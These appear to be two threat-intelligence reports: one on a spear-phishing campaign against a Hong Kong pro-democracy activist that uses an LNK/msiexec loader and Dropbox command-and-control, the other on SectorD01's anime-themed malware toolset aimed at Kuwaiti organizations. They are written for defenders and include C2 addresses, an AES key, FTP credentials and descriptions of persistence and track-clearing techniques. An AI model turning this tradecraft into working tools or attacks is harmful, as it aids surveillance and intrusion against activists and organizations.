At the end of October, a person deeply involved in the pro-democracy side of the Hong Kong protests received a spear phishing email from someone claiming to be a law student at a top foreign university, requesting for feedback on his supposed thesis which includes recommendations on how to end the Hong Kong unrest. The email contained a link to a Google drive ZIP file.
The ZIP archive contained three files – an August 2019 policy brief downloaded from Freedom House regarding the Democratic Crisis in Hong Kong, a September 2019 Hong Kong report downloaded from Human Rights First, and a supposed RTF file from the Nikkei Asian Review.
The third file masquerading as a Nikkei Asian Review document is actually a LNK shortcut file which had a double extension. When LNK files are viewed through archiving software, the double extension “.rtf.lnk” will be shown correctly. If the file was extracted and viewed through the Windows Explorer, however, the operating system always hides the LNK extension by default.
The LNK file is actually a shortcut to the Windows utility msiexec.exe, which can be used as a LOLBin to remotely download and run MSI files which have the PNG extension. In this case, the MSI file is remotely downloaded from a GitHub repository and account which was created on October 10.
The MSI file, “siHost64.png”, was created using a registered or cracked EXEMSI program. Running it will drop and run “siHost64.exe” in the %APPDATA% folder. This executable is a PyInstaller executable which has over a thousand files inside it, but the main important file is the compiled python script “siHost64”.
By restoring the first eight missing bytes of “siHost64” which is typically required for such PyInstaller files, we are then able to decompile the compiled python script and analyze the functionality of this malware:
Use the Python requests library to call the DropBox API which connects to DropBox and uses it as a HTTPS C2 server
Use the system proxy for communications if any
Add itself to the registry AutoRun location HKCU\Software\Microsoft\Windows\CurrentVersion\Run with the registry name “siHost64”. On October 31, the new version of the malware changed the registry name used to “Dropbox Update Setup”.
Perform AES encryption with CBC mode on uploaded files with the key “ApmcJue1570368JnxBdGetr*^#ajLsOw” and a random salt
Check in to the C2 server by creating an encrypted file containing the operating system version and architecture, date, computer name, and logged in user
Check for files from the C2 server which contain encrypted arbitrary commands to be run, execute that command, and create a new encrypted file containing the results of the executed command.
Based on the check in information from infected machines, it appears that there is a single infected Hong Kong victim of interest to this threat actor connecting to the Dropbox app besides the target we described at the start. The files exfiltrated from this victim appeared to be personal documents related to the victim traveling to the United States, business forms, and Christian hymns.
Besides those exfiltrated documents, the C2 server also appeared to host their next stage malware such as two files named “GetCurrentRollback.exe” and “GetCurrentDeploy.dll”. “GetCurrentRollback.exe” is a signed Microsoft executable which seems to be for upgrading the previous Windows operating system version to Windows 10, and “GetCurrentDeploy.dll” likely being the name of the DLL which is side loaded. The first version of “GetCurrentRollback.exe” we could find was since 2016 and the latest in 2019 November, which means all version might be exploitable by DLL Sideloading at first glance.
Based on the victim profile and the exfiltrated files, it appears one of the intelligence requirements of the threat actor is to monitor people with relations to the Hong Kong protests, targeting either them or the people around them. There are multiple possibilities for this requirements, with the most likely being to understand the inner thoughts of pro-democracy movement, or to support or undermine the movement behind the scenes.
Using Dropbox and other legitimate services such as Google Drive and GitHub throughout the attack life cycle is not a new concept for threat actors, allowing them to easily bypass network detection. To counter this threat, enterprises or teams within enterprises nowadays block or detect such Shadow IT services if they are not in official use, but individual or non-enterprise users which may be targeted by state sponsored threat actors rarely have this luxury.
The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.email@example.com.
MITRE ATT&CK Techniques
The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these and other related malware.
T1192 Spearphishing Link
T1204 User Execution T1218 Signed Binary Proxy Execution T1064 Scripting
T1060 Registry Run Keys / Startup Folder
T1140 Deobfuscate/Decode Files or Information T1036 Masquerading T1112 Modify Registry T1027 Obfuscated Files or Information T1218 Signed Binary Proxy Execution T1102 Web Service
T1083 File and Directory Discovery T1082 System Information Discovery T1033 System Owner/User Discovery T1124 System Time Discovery
T1005 Data from Local System
Command and Control
T1043 Commonly Used Port T1132 Data Encoding T1071 Standard Application Layer Protocol T1032 Standard Cryptographic Protocol T1102 Web Service
T1022 Data Encrypted T1041 Exfiltration Over Command and Control Channel
Multiple organizations in Kuwait have been targeted since 2018 by a threat actor we track as SectorD01, whose primary targets appear to be located in the Middle East but also observed by us to target North America, Europe, South Asia and East Asia in other campaigns. In this analysis we will briefly go through some of the tools used by this threat actor in the campaign which are named Sakabota, Diezen, Gon, Hisoka, Netero, and EYE, and explain how these tools are linked to each other and to other activity in the region.
When we looked at 21 samples of the tool named Sakabota, we noticed the file internal comments “Blade for not to killing” and the file’s icon which resembles a scar and has the internal name “Icon_kenshin”. “Kenshin” is the name of the main character with that scar from the Japanese anime “Rurouni Kenshin”, otherwise known as “Samurai X” to English viewers. His sword is named Sakabatō, which is a reverse-edge sword which does not kill, and this lines up with the file internal comments of “not to [sic] killing”.
The samples we looked at had the version numbers 1.4, 1.5, 1.6, 2.5, and 2.6. Some of its functions include using WMIC/PSEXEC/dsquery/Mimikatz/plink/RAR, FTP uploading to ftp://www[.]pasta58[.]com with credentials “administrator”/”Mono8&^Uj”, downloading files, taking screenshots, performing RDP, IP/port scanning across common services, dropping the svhost.exe agent / Shell.aspx web shell (see below), clearing traces of itself, and closing itself. The hardcoded C2 addresses are set as pasta58[.]com and 176[.]9[.]235[.]101, and hardcoded DNSCAT C2 address as 217[.]79[.]183[.]33.
Besides the functionality changes across versions, the threat actor also attached various resources to the malware. Different samples had different resources attached to them, and this was irrespective of the version codes.
Trusted Microsoft command-line utility for querying Active Directory Services. v5.2.3790.3959
Most of the “k” resources we saw were empty, but there was one which contained a sort of cheat sheet of different commands which the attacker could use for many techniques such as password cracking, passing the hash, dumping passwords, using certutil, and using the other embedded resources. Interestingly, in one section of the cheat sheet, there were URL examples of how to access a web shell which could possibly be a GET version of LittleFace. This web shell URL contained the domain of a Taiwanese university, suggesting the university may have been compromised in the past.
64-bit NirCmd command-line utility from NirSoft. v2.81
Command-line PuTTY. v0.62
A shortened version of the open-source powercat PowerShell utility.
64-bit command-line WinRAR. v4.20
Trusted Microsoft utility which has so far only been publicly reported to be used by TwoFace in 2017.
Signed and trusted Sysinternals/Microsoft PsExec utility. v2.2 This is an old version of PSEXEC which allows the attacker to bypass the graphical EULA using the “-accepteula” flag.
Custom Shell.aspx web shell which uses md5 hashing to check the password given in the “id” parameter of the POST request. There are some commonalities between this web shell and the IntrudingDivisor web shell used by TwoFace, but this web shell is more limited in functionality and is used for uploading files or executing commands via “cmd.exe /c”. It is created under the \dayzen directory relative to Sakabota when the attacker clicks on the “Shell” button in Sakabota. Only four samples of Sakabota contained the embedded Shell.aspx.
The executable svhost.exe dropper for the PowerShell malware Unit 42 named CASHY200, which accesses the C2 firewallsupports[.]com. This dropper had not been previously linked to the Sakabota malware. It is created under the \dayzen directory relative to Sakabota when the attacker clicks on the “Agent” button in Sakabota. Only one sample of Sakabota contained the embedded svhost.exe.
Another backdoor with the picture of a samurai used by the attacker which connects to pasta58[.]com, the same C2 server as Sakabota.
Another interesting thing to note is that the Sakabota malware was made to work not only with the embedded resources above, but also with Mimikatz which we believe was not embedded due to the likelihood of Sakabota being detected more easily. All of these tools together bear a striking resemblance to the various tools uploaded to a TwoFace web shell in the past.
Diezen is a simple backdoor which can be dropped by Sakabota which is set to connect to the same C2 address, pasta58[.]com, using a custom non-HTTP protocol over port 443 via the .NET TcpClient class primarily to execute attacker commands via “cmd.exe /c”. The samples we looked at had the version numbers 0.0.1, 0.5, and 0.6.
By the time Diezen reached version 0.6, it switched over to port 80 and added new functionality for file upload, download, taking screenshots, checking the user’s public IP via checkip[.]dyndns[.]org and checking if an alternative autostart location – the Start Menu – was available besides its normal usage of scheduled tasks. The feature of checking the user’s public IP was later carried over to the Hisoka malware as well, alongside implementing the previously unimplemented decryption and encryption routines, while the screenshot feature was carried over to the Gon malware.
Gon is the main character from the Japanese anime “Hunter × Hunter”. When looking at Gon and the other “Hunter × Hunter” themed malware, their code appears to have been originally branched out from the Sakabota malware. In Gon’s case, not only are there the embedded resources dsquery and plink, a large part of the non-GUI code is exactly the same and in fact still has remnants of “Sakabota” in one of its strings.
Just as the various versions of Sakabota have added functionality which were in its code but previously unimplemented, Gon has implemented some of Sakabota’s previously unimplemented code and also contains a password list containing slightly over 1000 passwords which are mainly variations around digits, the word “password”, and the word “kuwait”. These passswords are used for brute forcing from the tool.
EYE is the name of another simple tool we believe to be part of the attacker’s “Hunter × Hunter” themed toolset. The purpose of EYE is to log new processes created and to clear the attacker’s tracks when the attacker unexpectedly disconnects due to a new user logon. When looked at together with the other anime themed malware and the file icon, we believe the attacker thought of EYE as the scarlet eyes in “Hunter × Hunter”, giving the attacker additional capabilities when the attacker is emotionally agitated.
In fact, this clearing of tracks automatically upon disconnection is not a capability unique to the EYE malware as the exact same function exists in Sakabota. It hooks onto the .NET event SystemEvents.SessionSwitch so that if the attacker gets disconnected unexpectedly due to a new user logon, it will close all processes made after EYE was opened, delete file and registry keys related to attacker activity – recent files accessed, both automatic and custom jump lists which were first introduced in Windows 7, remote desktop history, search terms, autocomplete, and start menu run history. It will then close and delete itself.
Hisoka and Netero
Hisoka and Netero are also two important characters in the Japanese anime “Hunter × Hunter”.
Running Hisoka 0.8 with the arguments “66” will create a “Help.txt” file in the same folder, and this file contains instructions of how to use and interact with Hisoka from both the victim and attacker’s machine. It also contains functionality to query Active Directories via LDAP, which is likely meant to take over the functionality of the dsquery utility embedded in Sakabota. Funnily enough, the function is contained in an “AI” class of Hisoka which is most certainly not AI, proving even threat actors have joined the hype.
Hisoka is able to communicate with the attacker’s C2 server using a proper HTTP request over port 80 (unlike Diezen, which had its custom protocol and would be easily detected over the network) and DNS over port 53.
For its HTTP C2, it uses the hardcoded user agent string “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36” from Chome version 73 which was released on March 12, 2019.
For its DNS C2, it has an unused feature to perform an nslookup.exe check against hisoka[.]<C2_Address> in order to check its status which may be useful to check against later versions we have not seen. Example commands for performing its status check are:
On the other hand, the Netero malware is a helper utility and loader built for Hisoka and in fact cannot function without it. Unlike Hisoka, the attacker does not interact with Netero via command-line arguments but has to interact via modifying an obfuscated “command” in the registry. The way Netero loads and encrypts/decrypts data from the registry is similar to Hisoka – various registry keys from HKCU\EUDC\313\hisoka_v2 (Hisoka uses HKCU\EUDC\313\hisoka) are loaded, XOR-ed with 0x53, then Base64 decoded.
The attacker commands are loaded from HKCU\EUDC\313\hisoka_v2\CM and checked every 1-4 seconds. All of the other configurations including the kind of C2 server to use are loaded in the same way and checked constantly, with the result of any command being returned in another registry key. In this way, the attacker becomes able to interact constantly with Netero purely via the registry and no longer requires a GUI or CLI. Since the interaction with the registry has to be XOR-ed and Base64 encoded for very command, it means the attacker is using another wrapper program instead for this interaction.
The attacker also added another C2 “engine” to the Netero malware’s functionality. While Hisoka could previously already communicate with its C2 server via DNS and HTTP, Netero is also able to communicate with the C2 server via EWS ([Microsoft] Exchange Web Services), interacting with Microsoft Exchange servers using saved drafts in a manner reminiscent to how it interacts with the attacker via the registry.
Both Hisoka and Netero are stated to be “Compatible with Sakabota v3.4”, while later samples of Diezen was compatible with v2.0 and v2.1. While we did not find any version 3 or above samples of Sakabota, it shows that Sakabota is still in active development alongside the “Hunter × Hunter” themed malware and the end goal is likely for either Sakabota or Hisoka to act as the wrapper for all of the other malware which interacts via command-line / registry, similar to how Sakabota already acts as a wrapper for many other tools such as Mimikatz and PSEXEC.
Based on the attacker’s personal cheat sheet, the chunks of code dedicated to finding server software, and the internal web shell code, it is quite likely that one of the initial access routes used by the attacker is attacking organization web servers through SQL injection vulnerabilities for web shell upload, and organizations likely to be targeted should take note of this.
Also, since SectorD01 was first discovered in 2016, they already had a penchant for using DNS in their various malwares for their C2 communications even up till recently. One of the easy ways to detect this is to monitor the network for suspicious DNS traffic, although DNS over HTTPS may mask this in the future. It remains to be seen if the other teams of SectorD01 will take up EWS as a C2 protocol as well.
We believe Gon and the other “Hunter × Hunter” themed malware were branched off from Sakabota (and Diezen) to get around Sakabota’s large file size and eventually compartmentalize the attacker’s various tools into a sort of framework as their capabilities mature.
The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these and other related malware.
T1190 Exploit Public-Facing Application
T1059 Command-Line Interface T1106 Execution through API T1086 PowerShell T1053 Scheduled Task T1064 Scripting T1204 User Execution T1061 Graphical User Interface T1047 Windows Management Instrumentation
T1060 Registry Run Keys / Startup Folder T1053 Scheduled Task T1100 Web Shell T1078 Valid Accounts
T1100 Web Shell T1053 Scheduled Task T1078 Valid Accounts
T1140 Deobfuscate/Decode Files or Information T1202 Indirect Command Execution T1112 Modify Registry T1064 Scripting T1480 Execution Guardrails T1107 File Deletion T1070 Indicator Removal on Host T1078 Valid Accounts
T1110 Brute Force T1003 Credential Dumping
T1087 Account Discovery T1482 Domain Trust Discovery T1010 Application Window Discovery T1083 File and Directory Discovery T1046 Network Service Scanning T1135 Network Share Discovery T1057 Process Discovery T1012 Query Registry T1018 Remote System Discovery T1082 System Information Discovery T1033 System Owner/User Discovery
T1210 Exploitation of Remote Services T1075 Pass the Hash T1076 Remote Desktop Protocol T1105 Remote File Copy T1021 Remote Services T1051 Shared Webroot T1077 Windows Admin Shares
T1113 Screen Capture T1005 Data from Local System T1039 Data from Network Shared Drive
Command and Control
T1043 Commonly Used Port T1094 Custom Command and Control Protocol T1105 Remote File Copy T1132 Data Encoding T1001 Data Obfuscation T1008 Fallback Channels T1071 Standard Application Layer Protocol
T1041 Exfiltration Over Command and Control Channel T1048 Exfiltration Over Alternative Protocol T1022 Data Encrypted T1002 Data Compressed